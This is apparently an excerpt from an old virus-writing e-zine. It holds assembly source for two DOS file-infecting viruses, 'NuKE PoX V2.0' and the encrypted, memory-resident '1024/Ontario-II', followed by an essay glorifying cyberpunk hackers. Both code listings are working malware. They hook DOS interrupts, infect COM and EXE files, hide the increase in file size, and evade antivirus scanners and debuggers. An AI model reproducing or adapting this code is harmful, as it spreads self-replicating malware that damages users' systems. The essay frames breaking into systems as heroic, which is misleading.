jnz fcb_okay add bx,7h fcb_okay: mov ax,es:[bx+17h] and ax,1fh cmp al,1eh jnz not_infected and byte ptr es:[bx+17h],0e0h ;fix secs sub word ptr es:[bx+1dh],virus_size sbb word ptr es:[bx+1fh],0 not_infected: pop es pop bx pop ax old_out: iret ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- ; Int 21 Handler ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- int21_handler: cmp ah,11h je old_dir cmp ah,12h je old_dir cmp ax,4b00h ;File executed je dis_infect cmp ah,3dh je check_file cmp ah,3eh je check_file2 cmp ax,0abcdh ;Virus testing jne int21call mov bx,0abcdh int21call: jmp dword ptr cs:[int21] ;Split... check_file: jmp opening_file ;Like a Charm check_file2: jmp closing_file dis_infect: call disinfect ;EXE & COM okay dont_disinfect: push dx pushf push cs call int21call pop dx execute: push ax push bx push cx push dx push ds push ax push bx push cx push dx push ds push bp push cs pop ds mov dx,offset command mov bp,0abcdh jmp command1 command_ret: pop bp pop ds pop dx pop cx pop bx pop ax call check_4_av jc exit1 command1: mov ax,4300h ;Get file Attribs call calldos21 jc exit1 test cl,1h ;Make sure there normal jz open_file ;Okay there are and cl,0feh ;Nope, Fix them... mov ax,4301h ;Save them now call calldos21 jc exit open_file: mov ax,3D02h call calldos21 exit1: jc exit mov bx,ax ;BX File handler mov ax,5700h ;Get file TIME + DATE Call calldos21 mov al,cl or cl,1fh ;Un mask Seconds dec cx ;60 seconds xor al,cl ;Is it 60 seconds? jz exit ;File already infected push cs pop ds mov word ptr ds:[old_time],cx ;Save Time mov word ptr ds:[old_date],dx ;Save Date mov ah,3Fh mov cx,1Bh ;Read first 1B mov dx,offset ds:[buffer] ;into our Buffer call calldos21 jc exit_now ;Error Split mov ax,4202h ;Move file pointer xor cx,cx ;to EOF File xor dx,dx call calldos21 jc exit_now ;Error Split cmp word ptr ds:[buffer],5A4Dh ;Is file an EXE? 
je exe_infect ;Infect EXE file mov cx,ax sub cx,3 ;Set the JMP mov word ptr ds:[jump_address+1],cx call infect_me ;Infect! jc exit mov ah,40h ;Write back the mov dx,offset jump_address mov cx,3h call calldos21 exit_now: mov cx,word ptr ds:[old_time] ;Restore old time mov dx,word ptr ds:[old_date] ;Restore Old date mov ax,5701h call calldos21 mov ah,3Eh call calldos21 exit: cmp bp,0abcdh je command2 pop ds pop dx pop cx pop bx pop ax iret command2: jmp command_ret exe_infect: mov cx,word ptr cs:[buffer+20] mov word ptr cs:[exe_ip],cx mov cx,word ptr cs:[buffer+22] mov word ptr cs:[exe_cs],cx mov cx,word ptr cs:[buffer+16] mov word ptr cs:[exe_sp],cx mov cx,word ptr cs:[buffer+14] mov word ptr cs:[exe_ss],cx push ax push dx call multiply sub dx,word ptr cs:[buffer+8] mov word ptr cs:[vir_cs],dx push ax push dx call infect_me pop dx pop ax mov word ptr cs:[buffer+22],dx mov word ptr cs:[buffer+20],ax pop dx pop ax jc exit add ax,virus_size adc dx,0 push ax push dx call multiply sub dx,word ptr cs:[buffer+8] add ax,40h mov word ptr cs:[buffer+14],dx mov word ptr cs:[buffer+16],ax pop dx pop ax push bx push cx mov cl,7 shl dx,cl mov bx,ax mov cl,9 shr bx,cl add dx,bx and ax,1FFh jz outta_here inc dx outta_here: pop cx pop bx mov word ptr cs:[buffer+2],ax mov word ptr cs:[buffer+4],dx mov ah,40h mov dx,offset ds:[buffer] mov cx,20h call calldos21 exit_exe: jmp exit_now rocko endp vir_cs dw 0 exe_ip dw 0 exe_cs dw 0 exe_sp dw 0 exe_ss dw 0 exe_sz dw 0 exe_rm dw 0 ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- ; Opening File handle AX=3D ;------------------------------------------------------------------------- opening_file: call check_extension jnc open_fuck2 call check_exten_exe jnc open_fuck2 jmp dword ptr cs:[int21] open_fuck2: push ax mov ax,3d02h call calldos21 jnc open_fuck1 pop ax iret open_fuck1: push bx push cx push dx push ds mov bx,ax mov ax,5700h call calldos21 mov al,cl or cl,1fh dec cx ;60 Seconds xor al,cl jnz opening_exit3 dec 
cx mov word ptr cs:[old_time],cx mov word ptr cs:[old_date],dx mov ax,4202h ;Yes Pointer to EOF xor cx,cx xor dx,dx call calldos21 mov cx,dx mov dx,ax push cx push dx sub dx,1Bh ;Get first 3 Bytes sbb cx,0 mov ax,4200h call calldos21 push cs pop ds mov ah,3fh ;Read them into Buffer mov cx,1Bh mov dx,offset buffer call calldos21 xor cx,cx ;Goto Beginning of File xor dx,dx mov ax,4200h call calldos21 mov ah,40h ;Write first three bytes mov dx,offset buffer mov cx,1Bh cmp word ptr cs:[buffer],5A4Dh je open_exe_jmp mov cx,3h open_exe_jmp: call calldos21 pop dx ;EOF - Virus_Size pop cx ;to get ORIGINAL File size sub dx,virus_size sbb cx,0 mov ax,4200h call calldos21 mov ah,40h ;Fix Bytes xor cx,cx call calldos21 mov cx,word ptr cs:[old_time] mov dx,word ptr cs:[old_date] mov ax,5701h int 21h mov ah,3eh ;Close File call calldos21 opening_exit3: pop ds pop dx pop cx pop bx pop ax jmp dword ptr cs:[int21] ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- ; Closing File Handle INFECT it! 
;------------------------------------------------------------------------- closing_file: cmp bx,0h je closing_bye cmp bx,5h ja close_cont closing_bye: jmp dword ptr cs:[int21] close_cont: push ax push bx push cx push dx push di push ds push es push bp push bx mov ax,1220h int 2fh mov ax,1216h mov bl,es:[di] int 2fh pop bx add di,0011h mov byte ptr es:[di-0fh],02h add di,0017h cmp word ptr es:[di],'OC' jne closing_next_try cmp byte ptr es:[di+2h],'M' jne pre_exit jmp closing_cunt3 closing_next_try: cmp word ptr es:[di],'XE' jne pre_exit cmp byte ptr es:[di+2h],'E' jne pre_exit closing_cunt: cmp word ptr es:[di-8],'CS' jnz closing_cunt1 ;SCAN cmp word ptr es:[di-6],'NA' jz pre_exit closing_cunt1: cmp word ptr es:[di-8],'-F' jnz closing_cunt2 ;F-PROT cmp word ptr es:[di-6],'RP' jz pre_exit closing_cunt2: cmp word ptr es:[di-8],'LC' jnz closing_cunt3 cmp word ptr es:[di-6],'AE' ;CLEAN jnz closing_cunt3 pre_exit: jmp closing_nogood closing_cunt3: mov ax,5700h call calldos21 mov al,cl or cl,1fh dec cx ;60 Seconds xor al,cl jz closing_nogood push cs pop ds mov word ptr ds:[old_time],cx mov word ptr ds:[old_date],dx mov ax,4200h xor cx,cx xor dx,dx call calldos21 mov ah,3fh mov cx,1Bh mov dx,offset buffer call calldos21 jc closing_no_good mov ax,4202h xor cx,cx xor dx,dx call calldos21 jc closing_no_good cmp word ptr ds:[buffer],5A4Dh je closing_exe mov cx,ax sub cx,3h mov word ptr ds:[jump_address+1],cx call infect_me jc closing_no_good mov ah,40h mov dx,offset jump_address mov cx,3h call calldos21 closing_no_good: mov cx,word ptr ds:[old_time] mov dx,word ptr ds:[old_date] mov ax,5701h call calldos21 closing_nogood: pop bp pop es pop ds pop di pop dx pop cx pop bx pop ax jmp dword ptr cs:[int21] closing_exe: mov cx,word ptr cs:[buffer+20] mov word ptr cs:[exe_ip],cx mov cx,word ptr cs:[buffer+22] mov word ptr cs:[exe_cs],cx mov cx,word ptr cs:[buffer+16] mov word ptr cs:[exe_sp],cx mov cx,word ptr cs:[buffer+14] mov word ptr cs:[exe_ss],cx push ax push dx call multiply 
sub dx,word ptr cs:[buffer+8] mov word ptr cs:[vir_cs],dx push ax push dx call infect_me pop dx pop ax mov word ptr cs:[buffer+22],dx mov word ptr cs:[buffer+20],ax pop dx pop ax jc closing_no_good add ax,virus_size adc dx,0 push ax push dx call multiply sub dx,word ptr cs:[buffer+8] add ax,40h mov word ptr cs:[buffer+14],dx mov word ptr cs:[buffer+16],ax pop dx pop ax push bx push cx mov cl,7 shl dx,cl mov bx,ax mov cl,9 shr bx,cl add dx,bx and ax,1FFh jz close_split inc dx close_split: pop cx pop bx mov word ptr cs:[buffer+2],ax mov word ptr cs:[buffer+4],dx mov ah,40h mov dx,offset ds:[buffer] mov cx,20h call calldos21 closing_over: jmp closing_no_good ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- ; Infection Routine... ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- infect_me proc mov ah,40h mov dx,offset init_virus mov cx,virus_size call calldos21 jc exit_error ;Error Split mov ax,4200h xor cx,cx ;Pointer back to xor dx,dx ;top of file call calldos21 jc exit_error ;Split Dude... 
clc ;Clear carry flag ret exit_error: stc ;Set carry flag ret infect_me endp ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- ; DisInfection Routine for 4B ;------------------------------------------------------------------------- Disinfect PROC push ax push bx ;Save them push cx push dx push ds mov ax,4300h ;Get file Attribs call calldos21 test cl,1h ;Test for Normal Attribs jz okay_dis ;Yes, File can be opened and cl,0feh ;No, Set them to Normal mov ax,4301h ;Save attribs to file call calldos21 jc half_way okay_dis: mov ax,3d02h ;File now can be opened call calldos21 ;Safely jc half_way mov bx,ax ;Put File Handle in BX mov ax,5700h ;Get File Time & Date call calldos21 mov al,cl ;Check to see if infected or cl,1fh ;Unmask Seconds dec cx ;Test to see if 60 seconds xor al,cl jnz half_way ;No, Quit File AIN'T dec cx mov word ptr cs:[old_time],cx mov word ptr cs:[old_date],dx mov ax,4202h ;Yes, file is infected xor cx,cx ;Goto the End of File xor dx,dx call calldos21 push cs pop ds mov cx,dx ;Save Location into mov dx,ax ;CX:DX push cx ;Push them for later use push dx sub dx,1Bh ;Subtract file 1Bh from the sbb cx,0 ;End so you will find the mov ax,4200h ;Original EXE header or call calldos21 ;First 3 bytes for COMs mov ah,3fh ;Read them into Buffer mov cx,1Bh ;Read all of the 1B bytes mov dx,offset buffer ;Put them into our buffer call calldos21 jmp half half_way: jmp end_dis half: xor cx,cx ; xor dx,dx ;Goto the BEGINNING of file mov ax,4200h call calldos21 mov ah,40h ;Write first three bytes mov dx,offset buffer ;from buffer to COM mov cx,1Bh cmp word ptr cs:[buffer],5A4Dh je dis_exe_jmp mov cx,3h dis_exe_jmp: call calldos21 pop dx ;Restore CX:DX which they pop cx ;to the End of FILE sub dx,virus_size ;Remove Virus From the END sbb cx,0 ;of the Orignal File mov ax,4200h ;Get new EOF call calldos21 mov ah,40h ;Write new EOF to File xor cx,cx call calldos21 mov cx,word ptr cs:[old_time] mov dx,word ptr cs:[old_date] mov ax,5701h call 
calldos21 mov ah,3eh ;Close File call calldos21 end_dis: pop ds pop dx pop cx ;Restore 'em pop bx pop ax ret disinfect ENDP ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- ; Check File Extension DS:DX ASCIIZ ;-------------------------------------------------------------------------- Check_extension PROC push si push cx mov si,dx mov cx,256h loop_me: cmp byte ptr ds:[si],2eh je next_ok inc si loop loop_me next_ok: cmp word ptr ds:[si+1],'OC' jne next_1 cmp byte ptr ds:[si+3],'M' je good_file next_1: cmp word ptr ds:[si+1],'oc' jne next_2 cmp byte ptr ds:[si+3],'m' je good_file next_2: pop cx pop si stc ret good_file: pop cx pop si clc ret Check_extension ENDP ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- ; Check File Extension DS:DX ASCIIZ ;------------------------------------------------------------------------- Check_exten_exe PROC push si push cx mov si,dx mov cx,256h loop_me_exe: cmp byte ptr ds:[si],2eh je next_ok_exe inc si loop loop_me_exe next_ok_exe: cmp word ptr ds:[si+1],'XE' jne next_1_exe cmp byte ptr ds:[si+3],'E' je good_file_exe next_1_exe: cmp word ptr ds:[si+1],'xe' jne next_2_exe cmp byte ptr ds:[si+3],'e' je good_file_exe next_2_exe: pop cx pop si stc ret good_file_exe: pop cx pop si clc ret Check_exten_exe ENDP ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- ; Call Int_21h Okay ;------------------------------------------------------------------------- calldos21 PROC pushf call dword ptr cs:[int21] retn calldos21 ENDP ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- ; MultiPly ;-------------------------------------------------------------------------- multiply PROC push bx push cx mov cl,0Ch shl dx,cl xchg bx,ax mov cl,4 shr bx,cl and ax,0Fh add dx,bx pop cx pop bx retn multiply ENDP ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- ; Check for AV file... 
Like SCAN.EXE or F-PROT.EXE ;------------------------------------------------------------------------- Check_4_av PROC push si push cx mov si,dx mov cx,256h av: cmp byte ptr ds:[si],2eh je av1 inc si loop av av1: cmp word ptr ds:[si-2],'NA' jnz av2 cmp word ptr ds:[si-4],'CS' jz fuck_av av2: cmp word ptr ds:[si-2],'NA' jnz av3 cmp word ptr ds:[si-4],'EL' jz fuck_av av3: cmp word ptr ds:[si-2],'TO' jnz not_av cmp word ptr ds:[si-4],'RP' jz fuck_av not_av: pop cx pop si clc ret fuck_av: pop cx pop si stc ret Check_4_av ENDP msg db "NuKE PoX V2.0 - Rock Steady" old_time dw 0 old_date dw 0 file_handle dw 0 jump_address db 0E9h,90h,90h buffer db 90h,0CDh,020h ;\ db 18h DUP (00) ;-Make 1Bh Bytes last: seg_a ends end start ;========================================================================== ;========================================================================= ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; 1024-SRC Virus (Ontario-II) by Death Angel ; ======== ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; ;This VIRUS was only written as an experiment to see how far a computer ;virus could go through development. This pariticular virus in its present ;form WILL NOT do any damage to your data or go off bouncing a ball across ;your screen or play Yankee Doddle, IT WILL ONLY infect programs. ; ; Virus Information: ; Hides: In upper RAM, requires 3K of memory. ; Size: 1K (exactly when attached to either EXE or COM files) ; ID: Seconds in date of file is set to 32 (impossible value) ; .COM files, the 4th byte is 'O' ; .EXE files, the stack pointer is 0600h ; ; Cover-Up: If loaded with DEBUG, it will remove itself from memory. ; When doing a DIR, it will cover up the filesize increase. 
; ;Notes: Also infects on a file open if the file ends in COM,EXE or OVL ; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Stack_Size Equ 512+1 Code Segment Para Public 'CODE' Assume Cs:Code, Ds:Code Org 0000h Jmpfar Macro addr db 0EAh dd addr Endm Callfar Macro addr db 09Ah dd addr Endm Retfar Macro num db 0CAh dw num Endm ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; Do a loop to decode the rest of the virus. Virus_Begin: V00: Mov Bx, offset V05-V05_Back V04: Mov Cx, offset Start_Code-(offset V05-V05_Back) V01: Mov Al, 00h V02: Add Byte ptr Cs:[Bx], Al V03: Xor Al, 00h Inc Bx Loop V02 ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; V05_Back Equ 0 V05: Sub Bx, offset Start_Code Xchg Ax, Cx Dec Ax Int 21h Or Al, Ah Je Run_Prog Push Ds Xor Di, Di Mov Ds, Di Lds Ax, Dword ptr Ds:[21h*4] Mov Word ptr Cs:[Bx].Saved_21, Ax Mov Word ptr Cs:[Bx].Saved_21+2, Ds Mov Cx, Es Dec Cx Mov Ds, Cx Sub Word ptr Ds:[Di+03h], 3072/16 Mov Ax, Word ptr Ds:[Di+12h] Sub Ax, 3072/16 Mov Word ptr Ds:[Di+12h], Ax Mov Es, Ax Sub Ax, 1000h Mov Word ptr Cs:[Bx+Dos_Seg-2], Ax Push Cs Pop Ds Mov Si, Bx Mov Cx, offset Start_Code Cld Rep Movsb Mov Ds, Cx Cli Mov Word ptr Ds:[21h*4], offset New_21 Mov Word ptr Ds:[21H*4]+2, Es Sti Mov Ax, 4BFFh Push Bx Int 21h Pop Bx Pop Ds Push Ds Pop Es ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Run_Prog: Lea Si, [Bx].Start_Code Mov Di, 0100h Cmp Bx, Di Jb Run_Exe Run_COM: Push Di Movsw Movsw Ret Run_EXE: Mov Ax, Es Add Ax, 0010h Add Word ptr Cs:[Si+02], Ax Add Word ptr Cs:[Si+04], Ax Cli Mov Sp, Word ptr Cs:[Si+06] Mov Ss, Word ptr Cs:[Si+04] Sti Jmp Dword ptr Cs:[Si+00] ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Check_Present: Inc Ax Iret New_21: Cmp Ax, 0FFFFh ; Checking if resident ? Je Check_Present Cmp Ah, 4Bh ; Executing a program ? Je Load_Program Cmp Ah, 11h ; Doing a DIR ? 
Je Find_First Cmp Ah, 12h ; Doing a DIR ? Je Find_Next Cmp Ax, 3D00h ; Opening a file ? Jne Run_21 Call Open_File Run_21: Jmpfar 0 ; Goto vector 21h Saved_21 Equ $-4 ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Find_First: Find_Next: Push Bp Mov Bp, Sp Cmp Word ptr [Bp+04], 1234h Dos_Seg: Pop Bp Jb Run_21 Call Do_21 Call Save_Regs Mov Ah, 2Fh Call Do_21 Cmp Byte ptr Es:[Bx], 0FFh Je F20 Sub Bx, +7 F20: Mov Al, Byte ptr Es:[Bx].1Eh And Al, 1Fh Cmp Al, 1Fh Jne F00 Mov Dx, Word ptr Es:[Bx].26h Mov Ax, Word ptr Es:[Bx].24h Sub Ax, offset Virus_End Sbb Dx, +00 Or Dx, Dx Jb F00 Mov Word ptr Es:[Bx].26h, Dx Mov Word ptr Es:[Bx].24h, Ax F00: Call Restore_Regs IRet ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Load_Program: Cmp Al, 01h Je Disinfect_DEBUG Cmp Al, 0FFh Je Infect_COMSPEC Call Infect_File Jmp Run_21 ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Infect_COMMAND: Push Dx Push Ds Mov Dx, offset Command_File Push Cs Pop Ds Mov Byte ptr Ds:Command_Flag, 0FFh Call Infect_File Pop Ds Pop Dx Iret Infect_COMSPEC: Mov Ah, 51h Call Do_21 Mov Es, Bx Mov Ds, Es:[002Ch] Xor Si, Si Push Cs Pop Es LP00: Mov Di, offset COMSPEC_name Mov Cx, 0004h Rep Cmpsw Jcxz LP20 LP10: Lodsb Or Al, Al Jne LP10 ; Cmp Al, Byte ptr [Si] Cmp Byte ptr [Si], 00 Jne LP00 Jmp Infect_COMMAND LP20: Mov Dx, Si Mov Byte ptr Cs:Command_Flag, 0FFh Call Infect_File IRet ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Disinfect_DEBUG: Push Es Push Bx Call Do_21 Pop Bx Pop Es Call Save_Regs Jb LP30 Xor Cx, Cx Lds Si, Dword ptr Es:[Bx].12h Push Ds Push Si Mov Di, 0100h Cmp Si, Di Jl DI00 Ja LP31 Lodsb Cmp Al, 0E9h Jne LP31 Lodsw Push Ax Lodsb Cmp Al, 'O' Pop Si Jne LP31 Add Si, 103h Inc Cx Inc Cx Pop Ax Push Si Push Ds Pop Es Jmp short DI10 DI00: Lea Di, Dword ptr [Bx].0Eh Cmp Word ptr Es:[Di].00h, offset Virus_End+Stack_Size-2 Jne LP31 ; Note 4B01/decrements stack by 2 DI10: Lodsb Cmp Al, 0BBh Jne 
LP31 Lodsw Push Ax Lodsw Cmp Ax, Word ptr Cs:[V04] Pop Si Jne LP31 Add Si, offset Start_Code-(offset V05-V05_Back) Jcxz DI15 Rep Movsw Jmp short DI25 DI15: Mov Ah, 51h Call Do_21 Add Bx, 0010h Mov Ax, [Si+06h] Dec Ax Dec Ax Stosw Mov Ax, [Si+04h] Add Ax, Bx Stosw Movsw Lodsw Add Ax, Bx Stosw DI25: Pop Di Pop Es Xchg Cx, Ax Mov Cx, offset Virus_End Rep Stosb Jmp short LP32 LP31: Pop Ax Pop Ax LP32: Xor Ax, Ax Clc LP30: Call Restore_Regs Retfar 0002h ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Open_File Proc Near Call Save_Regs Mov Si, Dx OF00: Lodsb Or Al, Al Je OF50 Cmp Al, '.' Jne OF00 Mov Di, offset File_Exts-3 Push Cs Pop Es Mov Cx, 0003h OF10: Push Cx Push Si Mov Cl, 03h Add Di, Cx Push Di OF12: Lodsb And Al, 5Fh Cmp Al, Byte ptr Es:[Di] Jne OF15 Inc Di Loop OF12 Call Infect_File Add Sp, +6 Jmp short OF50 OF15: Pop Di Pop Si Pop Cx Loop OF10 OF50: Call Restore_Regs Ret Open_File Endp ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Infect_File Proc Near Call Save_Regs Mov Ax, 4300h Call Do_21 Jb IF00 Push Cx And Cl, 01h Cmp Cl, 01h Pop Cx Jne H00 And Cl, 0FEh Mov Ax, 4301h Call Do_21 H00: Mov Ax, 3D02h Call Do_21 Jnb IF02 IF00: Jmp IFE4 IF02: Xchg Bx, Ax Push Cs Push Cs Pop Ds Pop Es Mov Ax, 5700h Call Do_21 Push Dx Push Cx And Cl, 1Fh Cmp Cl, 1Fh Je IF05 Mov Dx, offset Exe_Header Mov Cx, offset Exe_Header_End-offset Exe_Header Mov Ah, 3Fh Call Do_21 Jnb IF10 IF05: Stc Jmp IFE2 IF10: Cmp Ax, Cx Jne IF05 Xor Dx, Dx Mov Cx, Dx Mov Ax, 4202h Call Do_21 Or Dx, Dx Jne IF12 Cmp Ax, offset Virus_End+Stack_Size Jb IF05 IF12: Cmp Word ptr Ds:Sign, 'ZM' Je EXE_type COM_type: Cmp Byte ptr Ds:Sign+3, 'O' Je IF05 Cmp Byte ptr Ds:Command_Flag, 00h Je CT00 Sub Ax, offset Virus_End Xchg Dx, Ax Xor Cx, Cx Mov Ax, 4200h Call Do_21 CT00: Mov Si, offset Sign Mov Di, offset Start_Code Movsw Movsw Sub Ax, 0003h Mov Byte ptr Ds:Sign, 0E9h Mov Word ptr Ds:Sign+1, Ax Mov Byte ptr Ds:Sign+3, 'O' Add Ax, (offset V05-V05_Back)+0103H 
Jmp short IF30 EXE_type: Cmp Word ptr Ds:Stack_Sp, offset Virus_End+Stack_Size Je IF05 Cmp Word ptr Ds:Overlay_Num, 0000h Jne IF05 Push Dx Push Ax Mov Cl, 04h Ror Dx, Cl Shr Ax, Cl Add Ax, Dx Sub Ax, Word ptr Ds:Size_Header Mov Si, offset Start_Ip Mov Di, offset Start_Code Movsw Movsw Mov Si, offset Stack_Ss Movsw Movsw Mov Word ptr Ds:Start_Cs, Ax Mov Word ptr Ds:Stack_Ss, Ax Mov Word ptr Ds:Stack_Sp, offset Virus_End+Stack_Size Pop Ax Pop Dx Push Ax Add Ax, offset Virus_End+Stack_Size Jnb IF29 Inc Dx IF29: Mov Cx, 512 Div Cx Mov Word ptr Ds:File_Size, Ax Mov Word ptr Ds:Remainder, Dx Pop Ax And Ax, 000Fh Mov Word ptr Ds:Start_Ip, Ax Add Ax, (offset V05-V05_Back) IF30: Mov Word ptr Ds:V00+1, Ax Push Ds Xor Si, Si Mov Ds, Si Mov Ax, Word ptr Ds:[046Ch] Pop Ds Push Bx Mov Byte ptr Ds:V01+1, Ah And Ax, 000Fh Xchg Bx, Ax Shl Bx, 01h Mov Ax, Word ptr [Bx].Random_AL Mov Word ptr Ds:V03, Ax Mov Di, offset Real_End Mov Cx, offset Virus_End Push Cx Cld Rep Movsb Mov Bx, (offset V05-V05_Back) Push Word ptr [Bx] Mov Byte ptr [Bx+V05_Back], 0C3h Push Bx Xor Byte ptr Ds:([Bx+V02+1])-(offset V05-V05_Back), 28h Add Bx, offset Real_End ; Toggle ADD [BX],AL/SUB [BX],AL Call V04 Pop Bx Pop Word ptr [Bx] Mov Dx, offset Real_End Pop Cx Pop Bx Mov Ah, 40h Call Do_21 IFE1: Jb IFE2 Xor Dx, Dx Mov Cx, Dx Mov Ax, 4200h Call Do_21 Jb IFE2 Mov Dx, offset Exe_Header Mov Cx, offset Exe_Header_End-offset Exe_Header Mov Ah, 40h Call Do_21 IFE2: Pop Cx Pop Dx Jb IFE3 Cmp Byte ptr Ds:Command_Flag, 0FFh Je IFE3 Or Cl, 1Fh IFE3: Mov Ax, 5701h Call Do_21 Mov Ah, 3Eh Call Do_21 IFE4: Mov Byte ptr Cs:Command_Flag, 00h Call Restore_Regs Ret Infect_File Endp Do_21 Proc Near Pushf Call Dword ptr Cs:Saved_21 Ret Do_21 Endp Save_Regs: Push Bp Mov Bp, Sp Push Bx Push Cx Push Dx Push Si Push Di Push Ds Push Es Pushf Xchg [Bp+02], Ax Push Ax Mov Ax, [Bp+02] Ret Restore_Regs: Pop Ax Xchg [Bp+02], Ax Popf Pop Es Pop Ds Pop Di Pop Si Pop Dx Pop Cx Pop Bx Pop Bp Ret 
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Random_AL: Inc Al ; 0 Dec Al ; 1 Inc Ax ; 2 Inc Ax Dec Ax ; 3 Dec Ax Add Al, Cl ; 4 Sub Al, Cl ; 5 Xor Al, Cl ; 6 Xor Al, Ch ; 7 Not Al ; 8 Neg Al ; 9 Ror Al, 01h ; A Rol Al, 01h ; B Ror Al, Cl ; C Rol Al, Cl ; D Nop ; E Nop Add Al, Ch ; F ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; COMSPEC_name db 'COMSPEC=' COMMAND_file db '\COMMAND.COM',0 FILE_Exts db 'COMEXEOVL' NUM_Exts equ 3 Start_Code dw 00000h dw 0FFF0h Start_Stack dw ? dw 0FFFFh Org 400h Virus_End: Saved_24 dw ?,? Command_Flag db 0 Temp dw ? Exe_Header: Sign dw ? Remainder dw ? File_Size dw ? Num_Real dw ? Size_Header dw ? Min_Above dw ? Max_Above dw ? Stack_Ss dw ? Stack_Sp dw ? CheckSum dw ? Start_Ip dw ? Start_Cs dw ? Display_Real dw ? Overlay_Num dw ? Exe_Header_End: Real_End: Code Ends End Virus_Begin ;========================================================================== =========================================================================== Evolution of The Cyberculture ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Something's happening here. What it is ain't exactly clear. There's a punk with a computer over there, tellin' me I got to beware... These days, a new breed of young politicized radicals, known as cyberpunks, roam a techno-underground. These cyberpunks are computer cowboys riding the trails of cyberspace. Circumventing software barriers in search of information and services or sometimes just to wreak a little mischievous havoc. They've got the equipment and, they say, the technical know how to slip into virtually any computer system and affect changes with global ramifications. They could effectively cripple the economy or shut down communications systems round the world. Cyberpunks hold the potential for becoming the most powerful countercultural force ever. The government has launched at least two major operations, one in 1990 called Operation Sundevil, to quash the movement. 
As Secret Service Special Agent John F. Lewis put it, "There are some very talented individuals who are unfortunately misdirecting their energies. But to say they're leaps and bounds ahead of law enforcement personnel isn't true."

Our CyberCulture has been built by the best. It perhaps was started by this tall and slender person, wearing black jeans and sporting a pair of John Lennon specs; we know him as Michael Synergy. Synergy was your basic computer punk. He spent his time exploring cyberspace, staging his own quiet protests by going where he wanted, when he wanted. Synergy became so adept at infiltrating systems that he's become a legend; today he remains something of an icon in the techno-underground.

Synergy explains that most of his adventures were meant to educate himself. At that time there wasn't a C compiler on microcomputers, so he'd break into Bell Labs just to learn C. Most hackers, Synergy says, use their talents simply to learn. In the very beginning Synergy managed to slip into a supposedly secure top-secret computer network run by the intelligence community and the Department of Defense (DOD), at which point the DOD took him out of cyber-circulation and brought him in to conduct "penetration testing and security design" for the National Security Agency, Secret Service, and FBI, as well as the DOD.

